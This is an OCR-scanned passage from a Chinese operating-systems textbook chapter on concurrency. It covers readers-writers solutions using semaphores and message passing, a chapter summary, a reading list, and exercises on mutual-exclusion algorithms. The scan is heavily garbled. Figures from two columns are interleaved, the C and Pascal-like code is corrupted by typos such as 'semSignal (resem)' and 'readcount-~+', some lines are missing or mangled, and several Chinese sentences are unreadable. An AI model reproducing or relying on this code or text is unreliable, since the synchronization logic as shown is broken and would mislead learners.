该 数据 区 。 对 于 写 进程 ， 在 已 有 定义 的 基础 上 还 必须 增加 下 列 信号 量 和 变量 : 

@ 信号 量 rsem: 当 至 少 有 一 个 写 进程 准备 访问 数据 区 时 ， 用 于 禁止 所 有 的 读 进 程 。 

@ 变量 writecount: 控制 rsem 的 设置 ; 

@ 信号 量 y: 控制 writecount 的 更 新 。 
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/* program readersandwriters */ 

int readcount, writecount; 

semaphore x = i, y = 1, z = 1, wsem = 1, rsem = 1; 
void reader() 


while (true) { 
semWait (z); 
semWait (rsem); 
semWait (x); 
readcount++; 
if (readcount == 1) 
semWait (wsem); 
semSignal (x); 
semSignal (resem); 
semSignal (2); 
READUNIT( ) 7 
semWait (x); 
readcount-~+ 
if (readcount == 0) semSignal (wsem); 
gemSignal (x); 
} 


/* program readersandwriters */ 
int readcount; 

semaphore x = 1, wsem = 1; 
void reader() 


while (true) { 
semWait (x); 
readcount++; 

if (readcount == 1) 
semWait (wsem); 
semSignal (x); 
READUNIT ( ) ; 
semWait (X); 
readcount; 

if (readcount == 0) 
semSignal (wsem); 
semSignal (x); 

} 


} 
void writer () 
{ 
while (true) { 
semWait (y)?; 
writecount+t; 
if (writecount == 1) semWait (rsem); 
semSignal (y); 
semWait (waem); 
WRITEUNIT( ); 
semSignal (wsem); 
semWait (y); 
writecount--; 
if (writecount == 0) semSignal (rsem); 
semSignal (y); 
} 


} 
void main() 


} 
void writer() 
{ 


while (true) { 
semWait (wsem); 
WRITEUNIT(); 
semSignal (wsem); 
} 
} 


void main() 


readcount = 0 


? readcount = writecount = 0; 
in (reader, writer); 


parbegin (reader, writer); 
} 


图 5.22 ”使 用 信号 量 解决 读者 - 写 者 问题 的 图 5.23 ”使 用 信号 量 解决 读者 - 写 者 问题 的 
一 种 方法 : 读者 优先 一 种 方法 : 写 者 优先 


对 于 读 进 程 ， 还 需要 一 个 额外 的 信号 量 。 在 rsem 上 不 允许 建造 长 队列 , 否则 写 进程 将 不 能 
跳 过 这 个 队列 , 因此 , 只 人 允许 一 个 读 进 程 在 rsem 上 排队 , 而 所 有 其 他 读 进程 在 等 待 rsem 之 前 ， 
在 信号 量 zx 上 排队 。 表 5.6 概括 了 这 些 可 能 性 。 





表 5.6 图 5.23 程序 中 的 进程 队列 状态 


vis a 。 设置 wsem 
系统 中 只 有 读 进程 。 没 有 队列 
系统 中 只 有 写 进 程 © 设置 wsem 和 rsem 


© 写 进程 在 wsem 上 排队 
。 由 读 进程 设置 wsem 
。 由 写 进程 设置 rsem 
既 有 读 进 程 又 有 写 进 程 ， 但 读 进 程 优 先 e 所 有 写 进 程 在 wsem 上 排队 
。 一 个 读 进程 在 rsem 上 排队 
© 其 他 读 进程 在 2 上 排队 
© 由 写 进程 设置 wsem 
由 写 进程 设置 rsem 
既 有 读 进 程 又 有 写 进 程 ， 但 写 进程 优先 © 写 进程 在 wsem 上 排队 
一 个 读 进 程 在 rsem 上 排队 
。 其 他 读 进 程 在 z 上 排队 


图 5.24 给 出 另 一 种 可 选 的 解决 方案 ， 它 赋予 写 进程 优先 权 ， 并 通过 消息 传递 来 实现 。 在 这 
种 情况 下 , 有 一 个 访问 共享 数据 区 的 控制 进程 , 其 他 想 访问 这 个 数据 区 的 进程 给 控制 进程 发 送 请 
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求 消息 ， 如 果 同 意 访问 ， 则 会 收 到 一 个 应 答 消 息 “OK”， 并 且 通 过 一 个 “finished” 消 息 表 示 访 
问 完成 。 控 制 进程 备 有 三 个 信箱 ， 每 个 信箱 存放 一 种 它 接收 到 的 消息 。 


void reader(int i) void controller() 
{ 
message rmsg; while (true) 
while (true) { 

rmsg = i; if gge > 0) { 
send (readrequest, rmsg); f (lempty {finished)) { 
receive (mbox[i}, rmsg); receive , Finished, msg); 
READUNIT {) count++ 





g= i: } 
send (finished, rmeg); else if (lempty ee tere eee)? { 
} receive (ur itereques 
} writer id = mag.i 
void writer(int j} count | = count — lob; 
{ 


} 
message rmsg; else if (lempty (readrequest)) { 
while(true) { receive (readrequest, msg); 
rmeg = j; count--; 
send (writerequest, rmeg); send (meg.id, "OK"); 
receive (mbox[j], rmsg); } 
ng a (); } 
if (count == 0 
send (finished, rmsg)} send (riter id, “OK"); 
ve (ginished, msg}; 


while (count < 0) { 
receive (finished, msg); 
count++ 
} 
} 





图 5.24 ”使 用 消息 传递 解决 读者 - 写 者 问题 的 一 种 方法 


ATES SHARIR, 控制 进程 先 服务 于 写 请 求 消 息 , 后 服务 于 读 请 求 消息 。 此 外 ， 必 须 
实施 互 斥 ， 为 实现 这 一 点 ， 需 要 使 用 变量 count， 它 被 初始 化 为 一 个 大 于 可 能 的 读 进程 数 的 最 大 
值 。 在 这 个 例子 中 ,我们 取 值 为 100。 控 制 器 的 动作 可 总 结 如 下 : 

© WR count>0, 则 没有 读 进 程 正 在 等 待 , 可 能 有 也 可 能 没有 活跃 的 读 进程 。 为 清除 活路 读 

进程 ， 首 先 服 务 于 所 有 “finished” 消 息 ， 然 后 服务 于 写 请 求 ， 再 服务 于 读 请 求 。 

© WR count=0， 则 唯一 未 解决 的 请 求 是 写 请 求 。 允 许 这 个 写 进程 继续 执行 并 等 待 一 个 

“finished” 消 息 。 

@ WÈ count<0, 则 一 个 写 进程 已 经 发 出 了 一 条 请 求 , 并 且 正 在 等 待 消除 所 有 活跃 的 读 进 程 。 

因此 ， 只 有 “finished” 消 息 将 得 到 服务 。 


5.7 Weg 


现代 操作 系统 的 核心 是 多 道 程序 设计 、 多 处 理 器 和 分 布 式 处 理 器 , 这 些 方案 的 基础 以 及 操作 
系统 设计 技术 的 基础 是 并 发 。 当 多 个 进程 并 发 执行 时 , 不 论 是 在 多 处 理 器 系统 的 情况 下 , 还 是 单 
处 理 器 多 道 程 序 系 统 中 ， 都 会 产生 冲突 和 合作 的 问题 。 

并 发 进程 可 以 按 多 种 方式 进行 交互 。 互 相 之 间 不 知道 对 方 的 进程 可 能 需要 竞争 使 用 资源 ,如 
处 理 器 时 间或 对 IO 设备 的 访问 。 进程 间 由 于 共享 访问 一 个 公共 对 象 , 如 一 块 内 存 空间 或 一 个 文 
件 ， 可 能 间接 知道 对 方 ， 这 类 交互 中 产生 的 重要 问题 是 互 斥 和 和 死 锁 。 

互 斥 指 的 是 ， 对 一 组 并 发 进程 ， 一 次 只 有 一 个 进程 能 够 访问 给 定 的 资源 或 执行 给 定 的 功能 。 
互 斥 技术 可 以 用 于 解决 诸如 资源 争 用 之 类 的 冲突 ,还 可 以 用 于 进程 间 的 同步 ,使 得 它们 可 以 合作 。 
后 一 种 情况 的 一 个 例子 是 生产 者 /消费 者 模型 ， 一 个 进程 向 缓冲 区 中 放 数 据 ， 另 一 个 或 更 多 的 进 
程 从 缓冲 区 中 取 数 据 。 

支持 互 斥 的 第 二 种 方法 涉及 使 用 专门 的 机 器 指令 , 这 种 方法 减少 了 开销 , 但 由 于 使 用 了 忙 等 
待 ， 效 率 较 低 。 


ESÈ H: ZRF 167 


支持 互 斥 的 另 一 种 方法 是 在 操作 系统 中 提供 相应 的 功能 ,其 中 最 常见 的 两 种 技术 是 信号 量 和 
消息 机 制 。 信 号 量 用 于 在 进程 间 发 信号 ,并 可 以 很 容易 地 实施 一 个 互 斥 协 议 。 消 息 对 实施 互 斥 是 
很 有 用 的 ， 它 还 为 进程 间 的 通信 提供 了 一 种 有 效 的 方法 。 


5.8 推荐 读物 


《Little Book of Semaphores )( 291 页 ) [DOWN07] 提 供 了 大 量 使 用 信号 量 的 示例 , 可 以 在 网 上 免费 获取 。 
[ANDR83] 概 括 了 本 章 描述 的 许多 机 制 。[ BEN82 ] 中 给 出 了 关于 并 发 、 互 上 斥 、 信 号 量 和 其 他 相关 主题 
的 非常 清楚 有 趣 的 讨论 。[ BEN90 ] 中 介绍 了 一 种 更 正式 的 方法 ,并 扩展 到 分 布 式 系统 。[ AXFO88 ] BA 
一 个 可 读 性 好 并 且 非 常 有 用 的 方法 ， 它 还 包含 了 许多 问题 以 及 解决 方案 。[ RAYN86 ] 包含 一 系列 详细 而 易 
懂 的 互 斥 算法 ,包括 软件 方法 ( 如 Dekker) 和 硬件 方法 以 及 信和 号 量 和 消息 。[ HOAR85 ] 是 一 本 可 读 性 极 好 
的 经 典 之 作 ， 它 给 出 了 定义 顺序 进程 和 并 发 的 一 种 正式 方法 。[ LAMP86 ] 是 关于 互 斥 的 一 个 元 长 的 正式 解 
决 方案 。[ RUDO90 ] 有 助 于 理解 并 发 。[ BACO03 ] 是 一 种 关于 并 发 的 组 织 得 很 好 的 方法 。[ BIRR89 ] 给 出 
了 对 并 发 程序 设计 很 实用 的 介绍 。[ BUHR95 ] 是 关于 管 程 的 详细 综述 。[ KANG98 ] 分 析 了 关于 读者 / 写 者 
问题 的 12 种 不 同 的 调度 策略 。 
ANDR83 Andrews,G.,and Schneider,F.“Concepts and Notations for Concurrent Programming.” Computing 
Surveys,March 1983. 
AXFO88 Axford, T. Concurrent Programming: Fundamental Techniques for Real-Time and Parallel 
Software Design. New York: Wiley, 1988. 
BACO03 Bacon, J. ,and Harris,T. Operating Systems: Concurrent and Distributed Software Design. Reading, 
MA: Addison-Wesley, 1998. 
BEN82 Ben-Ari, M. Principles of Concurrent Programming. Englewood Cliffs, NJ: Prentice Hall, 1982. 
BEN90 Ben-Ari, M. Principles of Concurrent and Distributed Programming. Englewood Cliffs, NJ: 
Prentice Hall, 1990. 
BIRR89 Birrell, A. An Introduction to Programming with Threads. SRC Research Report 35, Compaq Systems 
Research Center, Palo Alto, CA, January 1989. Available at http://www. research.compaq. com/SRC 
BUHR95 Buhr, P., and Fortier, M. “Monitor Classification.”4CM Computing Surveys, March 1995. 
DOWNO07 Downey, A. The Little Book of Semaphores.www.greenteapress.com/sema-phores/ 
HOARSS Hoare, C. Communicating Sequential Processes. Englewood Cliffs, NJ: Prentice-Hall, 1985. 
KANG98 Kang, S., and Lee, J. “Analysis and Solution of Non-Preemptive Policies for Scheduling Readers 
and Writers.” Operating Systems Review, July 1998. 
LAMP86 Lamport, L. “The Mutual Exclusion Problem.” Journal of the ACM, April 1986. 
RAYN86 Raynal, M. Algorithms for Mutual Exclusion. Cambridge, MA: MIT Press, 1986. 
RUDO90 Rudolph, B. “Self-Assessment Procedure XXI: Concurrency.” Communications of the ACM, 
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5.9 关键 术语 、 复 习题 和 习题 
关键 术语 
原子 性 并 发 死 锁 T 信号 量 
二 元 信号 量 协同 程序 -MESE 互 斥 量 DUR 
阻塞 计数 信号 量 消息 传递 无 阻塞 强 信号 量 
CER 临界 资源 管 程 竞争 条 件 Bias i 


并 发 进程 临界 区 
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Hog tf # 


复习 题 


列 出 与 并 发 相关 的 四 种 设计 问题 。 

产生 并 发 的 三 种 上 下 文 环境 是 什么 ? 

执行 并 发 进程 的 最 基本 的 要 求 是 什么 ? 

列 出 进程 间 的 三 种 互相 知道 的 程度 ， 并 简单 地 给 出 各 自 的 定义 。 
竞争 进程 和 合作 进程 间 有 什么 区 别 ? 

列 出 与 竞争 进程 相关 的 三 种 控制 问题 ， 并 简单 地 给 出 各 自 的 定义 。 
列 出 对 互 斥 的 要 求 。 

在 信号 量 上 可 以 执行 什么 操作 ? 

二 元 信号 量 和 一 般 信号 量 有 什么 区 别 ? 


5.1 
5.2 
5.3 
5.4 
5.5 
5.6 
5.7 
5.8 
5.9 
5.10 
5.11 
5.12 
5.13 


强 信号 量 和 弱 信 号 量 有 什么 区 别 ? 


什么 是 管 程 ? 


习题 


5.1 在 5.1 节 一 开始 就 指出 ， 在 并 发 这 个 问题 上 ， 多 道 程序 设计 和 多 处 理 器 代表 了 同一 类 问题 。 到 目前 为 
止 ， 这 种 说 法 是 正确 的 。 但 是 请 举例 说 明 多 道 程序 设计 与 多 处 理 器 系统 在 并 发 概念 上 的 不 同 点 。 
进程 和 线程 为 实现 比 串 行程 序 更 复杂 的 程序 提供 了 强大 的 工具 , 一 个 很 有 启发 性 的 早期 结构 是 协同 程 
序 。 本 习题 的 目的 是 介绍 协同 程序 ， 并 与 进程 进行 比较 。 考 虑 [ CONW63 ] 中 的 一 个 简单 问题 : 


5.2 


对 于 消息 ， 阻 塞 和 无 阻塞 有 什么 区 别 ? 
通常 与 读者 - 写 者 问题 相关 联 的 有 了 哪些 条 件 ? 


读 80 列 卡片 ， 并 通过 下 列 改 变 把 它们 打印 在 每 行 125 个 字符 的 行 中 。 在 每 个 卡片 图 像 后 插入 一 


个 额外 的 空白 符 ， 并且 卡片 中 每 对 相 邻 的 星 号 (** ) 由 字符 TIRE. 
a) 开发 该 问题 的 一 种 普通 的 串 行程 序 解决 方案 。 你 将 会 发 现 该 程序 的 编写 很 有 技巧 。 由 于 长 度 从 80 


转变 到 125， 程 序 中 各 种 元 素 间 的 交互 是 不 平衡 的 ; 此 外 ， 在 转换 后 ， 卡 片 图 像 的 长 度 变 化 取决 
于 双星 号 的 数目 。 提 高 清晰 度 并 减少 错误 的 一 种 方法 是 把 该 程序 编写 成 三 个 独立 的 过 程 ， 第 一 个 
过 程 读 取 卡 片 图 像 ， 在 每 个 图 像 后 补充 空格 ， 并 将 字符 流 写 人 一 个 临时 文件 。 当 读 完 所 有 卡片 后 ， 
第 二 个 过 程 读 取 这 个 临时 文件 ， 完 成 字符 替换 ， 并 写 出 到 第 二 个 临时 文件 。 第 三 个 进程 从 第 二 个 
临时 文件 中 读 取 字 符 流 ， 按 每 行 125 个 字符 进行 打印 。 


b) 串 行 方案 之 所 以 没有 吸引 力 , BAH VO 和 临时 文件 的 开销 。Conway 提出 了 一 种 新 程序 结构 格式 : 


c 


ww 


协同 程序 , 它 人 允许 把 应 用 程序 编写 成 通过 字符 缓冲 区 连接 起 来 的 三 个 程序 ( 见 图 5.25 )。 在 传统 的 
过 程 中 , 在 调用 过 程 和 被 调用 过 程 间 存 在 主 / 从 关系 , 调用 过 程 可 以 在 过 程 中 的 任何 一 点 执行 调用 ， 
被 调用 过 程 从 它 的 入 口 点 开始 ， 并 在 调用 点 返回 调用 过 程 。 协 同 程序 显示 出 一 种 更 对 称 的 关系 ， 
在 每 次 进行 调用 时 ， 从 被 调用 过 程 中 上 一 次 的 活跃 点 开始 执行 。 由 于 没有 调用 过 程 高 于 被 调用 过 
程 的 感觉 ， 也 就 没有 返回 。 相 反 ， 任何 一 个 协同 程序 都 可 以 通过 恢复 命令 把 控制 传递 给 另 一 个 协 
同 程序 。 当 一 个 协同 程序 第 一 次 被 调用 时 ， 它 在 人 口 点 被 “恢复 ”， 接 下 来 ,该 协同 程序 在 它 拥有 
上 一 个 恢复 命令 处 被 重新 激活 。 注 意 ， 程 序 中 一 次 只 能 有 一 个 协同 程序 处 于 执行 状态 ， 并 且 转 移 
点 可 以 在 代码 中 显 式 定义 。 

因此 这 不 是 一 个 并 发 处 理 的 例子 。 请 解释 图 5.25 中 程序 的 操作 。 

这 个 程序 没有 解决 终止 条 件 。 假 设 如 果 VO 例 程 READCARD 把 一 个 80 个 字符 的 图 像 放 人 inbuf， 
它 返回 trtue， 否 则 返回 false。 修 改 这 个 程序 ， 以 包含 这 种 可 能 性 。 注 意 最 后 打印 的 一 行 可 能 因此 
少 于 125 个 字符 。 


d) 使 用 信号 量 重 写 解决 方案 。 


char re, sp; 


char inbuf(80], outbuf[125} ; 


void read() 


while (true) { 
READCARD (inbuf); 
for (int i=0; i < 80; 
rs = inbuf [i]; 


itt) { 


HIF 


void squash(} 


while (true) { 
if (rs le "Hy { 
Sp = rs; 
RESUME print; 
} 
else, 
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RESUME squash RESUME read; 
} 42 《FS == "*") { 
me" n; sp = "ft"; 
RESUME squash; RESUME print; 
} 


} 
void print() 


while (true) { 
for (int j = 0; j < 125; j++) 
outbuf [j] = sp; } 
RESUME squash 


RESUME print; 


} 
RESUME read; 


} 
OUTPUT (outbuf); } 
} 





图 5.25 协同 程序 的 一 个 例子 
53 有 如 下 代码 : 


program concurrency; 
var x: integer ( := 0); 
y: integer ( ;= 0); 
procedure threadA(); 
begin 
x= 1; (* 语句 1 *) 
Yuyi+ x; (* 语句 2 *) 
end; 
procedure threadB(); 
begin 
Y= 4; (* 语句 3 *) 
x= xX+5; (* ay 4 *) 
end; 
begin (* 主 程序 *) 
parbegin 
threadA(); 
threadB(); 
parend 
end. 
假定 该 进程 有 两 个 并 发 的 线程 ， 一 个 线程 执行 语句 1 和 2， 另 一 个 线程 执行 语句 3 和 4。 列 出 在 
这 段 代码 执行 完 时 , 变量 取 值 的 所 有 可 能 性 , 并 对 每 一 种 可 能 性 给 出 语句 1 ~ 4 必须 满足 的 执行 顺序 。 
假定 语句 1 ~ 4 都 是 原子 的 。 
54 使 用 通用 的 信号 量 填写 完整 如 下 的 程序 框架 ， 使 得 进程 总 是 以 A( 可 以 是 任何 一 个 实例 )，B，A，A 
的 顺序 结束 。 
program As and Bs; 
var { 信号 量 声明 } 
procedure A(); 
begin 
{ MHA P,Y 语 句 } 
end; 
procedure B(); 
begin 
{ 仅 填 人 P, viš } 
end; 
begin (* 主 程序 *) 
parbegin 
AQ); 


5.5 
5.6 


5.7 


A(); 
AQ); 
B(); 
parend 
end. 
忙 等 待 的 含义 是 什么 ?讨论 可 以 用 来 避免 忙 等 待 的 另 一 种 技术 
考虑 下 面 的 程序 : 
boolean blocked[2}]; 
int turn; 
void P(int id) 
while(true) { 
blocked[id] = true; 
while(turn != id) { 
while (blocked [1-id]) 
/* 不 做 任何 事 */; 
turn = id; 
} 
/* 临界 区 */ 
blocked[id] = 
/* 其 他 部 分 */ 


false; 


} 
} 


void main () 


{ 


blocked[0] = false; 
blocked[1] = false; 
turn = 0; 
parbegin(P(0), P(1)); 


} 


这 是 [ HYMA66 ] 中 提出 的 解决 互 斥 问题 的 一 种 软件 方法 。 请 举 出 证 明 该 方法 不 正确 的 一 个 反例。 有 


趣 的 是 ， 连 ACM 通信 都 被 它 蒙 荐 了， 


解决 互 斥 的 另 一 种 软件 方法 是 Lamport 的 面包 店 算 法 [LAMP74 j。 之 所 以 起 这 个 名 字 是 因为 它 的 思想 
来 自 于 面包 店 或 其 他 商店 中 ， 每 个 顾客 在 到 达 时 都 得 到 一 个 有 编号 的 票 ， 并 按 票 号 依次 得 到 服务 。 算 


法 如 下 : 

boolean choosing[n]; 
int number [n]; 
while(true) { 


choosing[i] = true; 

number[i] = 1 + getmax(number[], n); 
choosing[i] = false; 

for(intj = 0; j < n; j++) { 


while(choosing[j]) { }; 
while((number[j] != 0) 


} 
/* AR */; 
number [i] = 0; 
/* 其 他 部 分 */; 

} 


数组 choosing 和 number 分 别 被 初始 化 成 false 和 0。 每 个 数组 的 第 i 个 元 素 可 以 由 进程 i 读 或 写 ,， 但 


其 他 进程 只 能 读 。 表 达 式 (a, b) < (c, d) 被 定义 成 
(a<c) 或 (a=c 且 b<d) 
a) 用 文字 描述 这 个 算法 。 
b) 说 明 这 个 算法 避免 了 死 锁 。 
c) 说 明 它 实施 了 互 斥 。 


， 并 比较 两 种 方法 的 区 别 。 


&& (number [jj] ,j) < (number[i],i)) { }; 
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58 ”考虑 面包 师 算法 的 一 个 版 本 ， 该 版 本 没有 使 用 变量 choosing, RTF: 
int number [n]; 
while (true) { 


number[i] = 1 + getmax(number{[], n); 
for (int j = 0; j < n; j++){ 
while ((number(j] != 0) && (number[j],j) < (number[il,i)) { }; 
} 
/* 临界 区 */; 
number [i] = 0; 
/* 其 余部 分 */; 
} . 
DEAREST LAM? 解释 原因 。 ? 


Animation: isenberg-McGuire 
5.9 考虑 下 列 程序 ， 该 程序 给 出 了 解决 互 斥 问题 的 一 个 软件 方法 。 
integer array control [1 :N]; integer k 
KY, 1Sk<N, control 的 每 一 个 元 素 为 0、1 和 2， 所 有 元 素 初 值 为 0，Kk 的 初 值 是 任意 的 。 
第 i 个 进程 (1<i<N) 的 代码 如 下 : 
begin integer j; 


LO: control [i] := 1; 
LI: for j:=k step 1 until N, 1 step 1 until k do 
begin 


if j = i then goto L2; 
if control [j] &ne; 0 then goto L1 


end; 
L2: control [i] := 2; 
for j := 1 step 1 until N do 


if j &ne; i and control [j] = 2 then goto LO; 
L3: if control [k] &ne; 0 and k &ne; i then goto LO; 


L4: k := i; 
临界 区 ; 
L5: for j := k step 1 until N, 1 step 1 until k do 
if j &me; k and control [j] &ne; O then 
begin 
k := ji 
goto L6 
end; 
L6: control [i] := 0; 
L7: 循环 剩余 部 分 ; 
goto LO; 
end 


这 就 是 Eisenberg-McGuire 算法 ， 解 释 算法 的 操作 和 主要 特点 。 
5.10 ”考虑 图 5.2b 中 的 第 一 个 polt = 0 语句 。 
a) 使 用 exchange 指令 是 否 能 够 得 到 相同 的 结果 ? 
b) 哪 一 种 方法 更 好 一 些 ? 
5.11 SRA 5.2 的 形式 使 用 专门 机 器 指令 提供 互 斥 时 ,对 进程 在 允许 访问 临界 区 之 前 必须 等 待 多 久 没 有 限 
制 。 设 计 一 个 使 用 compare&swap 指令 的 算法 , 且 保 证 任何 一 个 等 待 进入 临界 区 的 进程 在 n-1 个 turn 
内 进入 , n 是 要 求 访问 临界 区 的 进程 数 ，turn 是 指 一 个 进程 离开 临界 区 ， 另 一 个 进程 获准 访问 临界 区 
的 事件 。 
5.12 ”在 文献 中 经 常 提 及 的 另 一 个 支持 互 斥 的 原子 机 器 指令 是 test&set 指令 ， 定 义 如 下 : 


boolean test_and_set (int i) 


{ 
it (i == 0) { 
i = 1; 
return true; 
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} 


else return false; 
使 用 testeset 指令 定义 一 个 与 图 5.2 类 似 的 过 程 。 
考虑 下 面 关 于 信和 号 量 的 定义 : 
void semWait (s) 
{ 
if (s.count > 0) { 
8.count~—; 


} 


else { 
place this process in s.queéue; 
block; 


} 
} 


void semSignal (s) 


{ 
if(there is at least one process blocked on semaphore s) { 
remove a process P from s.queue; 
place process P on ready list; 


} 


else 
s.count++; 


} 

将 该 定义 与 图 5.3 中 的 定义 进行 比较 ， 得 出 两 个 定义 之 间 有 一 个 区 别 : 在 前 面 的 定义 中 ， 信 号 量 永 
远 不 会 取 负 值 。 当 在 程序 中 分 别 使 用 这 两 种 定义 时 ， 其 效果 有 什么 不 同 ? 即 能 和 否 在 不 改变 程序 意义 
的 前 提 下 ， 用 一 个 定义 代替 另 一 个 ? 

考虑 具有 如 下 特征 的 共享 资源 : 1) 当 使 用 该 资源 的 进程 小 于 3 个 时 ， 新 申请 资源 的 进程 可 以 立刻 获 
得 资源 ; 2 ) 当 三 个 资源 都 被 占用 后 ， 只 有 当前 使 用 资源 的 三 个 进程 都 释放 资源 后 ， 其 他 申请 资源 的 
进程 才能 够 获得 资源 。 由 于 需要 使 用 计数 器 来 记录 有 多 少 进程 正在 使 用 资源 和 等 待 资源 ， 而 这 些 计 
数 器 自身 也 需要 互 斥 执行 修改 动作 的 共享 资源 ， 所 以 可 以 采用 如 下 的 程序 : 


1 semaphore mutex = 1, block = 0; /* 共享 变量 : semaphores, */ 
2 int active = 0, waiting = 0; /* 计数 器 */ 
3 boolean must_wait = false; /* 状态 信息 */ 
4 

5 semWait (mutex); /* 进入 临界 区 */ 
6 df(must wait) { /* 如 果 有 等 于 或 超出 三 个 进程 正在 使 用 资源 ， 则 */ 
7 ++waiting; /* 新 进程 需要 等 待 ， 但 是 在 这 之 前 必须 先 */ 
8 semSignal (mutex) ; /* 离开 临界 区 */ 
9 semWait (block) ; /* 等 待 至 当前 所 有 的 资源 持 有 者 离开 */ 
10 semWait (mutex) ; /* 重新 进入 临界 区 */ 
11 --waiting; /* 并 且 更 新 等 待 进程 数 */ 
12 

13 active, /* 更 新 正在 使 用 资源 进程 数 ， 同 时 */ 
14 must_wait = active == 3; /* 如 果 该 计数 器 达到 了 3 ， 则 需要 标记 must_wait 变量 */ 
15 semSignal (mutex); /* 离开 临界 区 */ 
16 

17 /* 临界 区 : 对 获得 的 资源 进行 操作 */ 

18 

19 semWait (mutex) ; /* 进入 临界 区 */ 
20 --active; /* 更 新 正在 使 用 资源 进程 数 */ 
21 if(active == 0) { /* 如 果 当 前 进程 是 最 后 一 个 使 用 者 */ 
22 int n; 

23 if (waiting < 3) n = waiting; 


24 else n = 3; /* 如 果 等 待 进程 数 大 于 3， 则 限制 唤醒 个 数 为 3 */ 
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25 while( n > 0 ) { /* 唤醒 等 待 的 进程 */ 
26 semSignal (block) ; 

27 --n; 

28 } 

29 must_wait = false; /* 标记 所 有 的 资源 使 用 者 均 已 离开 */ 
30 } 

31 semSignal (mutex) ; /* 离开 临界 区 */ 


这 个 程序 看 起 来 没有 问题 : 所 有 对 共享 数据 的 访问 均 被 临界 区 所 保护 ， 进 程 在 临界 区 中 执行 时 
不 会 自己 阻塞 ， 新 进程 在 有 三 个 资源 使 用 者 存在 时 不 能 使 用 共享 资源 ， 最 后 一 个 离开 的 使 用 者 会 唤 
醒 最 多 3 个 等 待 着 的 进程 。 
a) 这 个 程序 仍 不 正确 ， 解 释 其 出 错 的 位 置 ; 
b) 假如 我 们 将 第 六 行 的 证 语句 更 换 为 while 语句 ,是否 解决 了 上 面 的 问题 ?有 什么 难点 仍然 存在 ? 
现在 考虑 上 一 题 的 正确 解法 ， 如 下 : 


1 Semaphore mutex = 1, block = 0; /* 共享 变量 : semaphores, */ 
int active = 0, waiting = 0; /* 计数 器 */ 

3 boolean must wait = false; /* 状态 信息 */ 

4 

5 semWait (mutex); /* 进入 临界 区 */ 

6 if(lmust wait) { /* 如 果 有 等 于 或 超出 三 个 进程 正在 使 用 资源 ， 则 */ 

7 ++waiting; /* 新 进程 需要 等 待 ， 但 是 在 这 之 前 必须 先 */ 

8 semSignal (mutex) ; /* 离开 临界 区 */ 

9 semWait (block) ; /* 等 待 至 当前 所 有 的 资源 持 有 者 离开 «/ 

10 } else { 

11 ++active; /* 更 新 正在 使 用 资源 进程 数 ， 同 时 */ 

12 must_wait = active == 3; /* 如 果 该 计数 器 达到 了 3， 则 需要 标记 must_wait 变量 */ 

13 semSignal (mutex); /* 离开 临界 区 */ 

14 } 

15 

16 /* 临界 区 : 对 获得 的 资源 进行 操作 */ 

17 

18 semWait (mutex) ; /* 进入 临界 区 */ 

19 --active; /* 更 新 正在 使 用 资源 进程 数 t + / 

20 if(active == 0) { /* 如 果 当 前 进程 是 最 后 一 个 使 用 者 */ 

21 int n; 

22 if (waiting < 3) n = waiting; 

23 else n = 3; /* 如 果 当 前 进程 是 最 后 一 个 使 用 者 */ 

24 waiting -= n; /* 减少 等 待 进程 的 个 数 */ 

25 active = n; /* 并 设置 唤醒 进程 个 数 */ 

26 while( n>0) { /* 唤醒 等 待 的 进程 */ 

27 semSignal (block); /*one by one */ 

28 --n; 

29 } 

30 must_wait = active == 3; /* 标记 所 有 的 资源 使 用 者 均 已 离开 */ 

31 

32 sm ignal mutex) ; /* 离开 临界 区 */ 


a) 解释 这 个 程序 的 工作 方式 ， 为 什么 这 种 工作 方式 是 正确 的 ? 

b ) 这 个 程序 不 能 完全 避免 新 到 达 的 进程 捅 到 已 有 等 待 进程 前 得 到 资源 , 但 是 至 少 使 这 种 问题 的 发 生 
减少 了 。 给 出 一 个 例子 。 

c ) 这 个 程序 是 一 个 使 用 信号 量 实现 并 发 问题 的 通用 解法 样 例 , 这 种 解法 称 做 “I"l1 Do it for You” ( 由 
释放 者 为 申请 者 修改 计数 器 ) 模式 。 解 释 这 种 模式 。 


5.16 ”现在 考虑 上 一 题 的 另 一 个 正确 解法 ， 如 下 : 


1 semaphore mutex = 1, block = 0; /* 共享 变量 : semaphores */ 
2 int active = 0, waiting = 0; /* 计数 器 */ 


5.17 


FAY # # 


boolean must_wait = false; /* 状态 信息 


semWait (mutex) ; /* 进入 临界 区 
if(must_wait) { /* 如 果 有 等 于 或 超出 三 个 进程 正在 使 用 资源 ， 则 
++waiting; /* 新 进程 需要 等 待 ， 但 是 在 这 之 前 必须 先 
semSignal (mutex) ; /* 离开 临界 区 
semWait (block) ; /* 等 待 至 当前 所 有 的 资源 持 有 者 离开 
--waiting; /* HATRAR, Beta 
active; /* 更 新 正在 使 用 资源 进程 数 ， 同 时 


must_wait = active == 3; /* 如 果 该 计数 器 达到 了 3 ， 则 需要 标记 must_wait 变量 


if (waiting > 0 && !must_wait) /* 如 果 有 进程 正在 等 待 ， 且 
semSignal (block) ;; /* 使 用 资源 的 进程 个 数 不 足 3 个 ， 则 

/* 当前 进程 唤醒 一 个 正在 等 待 的 进程 

else semSignal (mutex) ; /* 和 否则， 离开 临界 区 


/* 临界 区 : 对 获得 的 资源 进行 操作 */ 


semWait (mutex) ; /* 进入 临界 区 
--active; - /* 更 新 正在 使 用 资源 进程 数 
if(active == 0) /* 如 果 当 前 进程 是 最 后 一 个 使 用 者 
must_wait = false; /* 允许 新 进程 进入 
if(waiting == 0 && !must_ wait) /* 检查 是 否 还 有 正在 等 待 的 进程 
semSignal (block) ;; /* 如 果 没 有 进程 正在 等 待 ， 并 且 人 允许 新 进程 直接 获得 资源 

/* 则 将 block 互 斥 变量 标记 为 可 以 直接 通过 

else semSignal (mutex); /* BW, BHA 


a) 解释 这 个 程序 的 工作 方式 ， 为 什么 这 种 工作 方式 是 正确 的 ? 
b) 这 个 方法 在 可 以 同时 唤醒 进程 个 数 上 是 否 和 上 一 题 的 解法 有 所 不 同 ? 为 什么 ? 
c ) 这 个 程序 是 一 个 使 用 信号 量 实现 并 发 问题 的 通用 解法 样 例 , 这 种 解法 称 做 “Pass the Paton” ( 接 


力 棒 传递 ) 模式 。 解 释 这 种 模式 。 


*/ 


*/ 


*/ 


可 以 用 二 元 信和 号 量 实现 一 般 信 和 号 量 。 我 们 使 用 semwaitB 操作 和 semSsignalB 操作 以 及 两 个 二 元 信 
SEH delay 和 mutex。 考 虑 下 面 的 代码 : 


void semWait (semaphore s) 


{ 


} 


semWaitB (mutex) ; 

s-; 

if(s < 0) { 
semSignalB (mutex) ; 
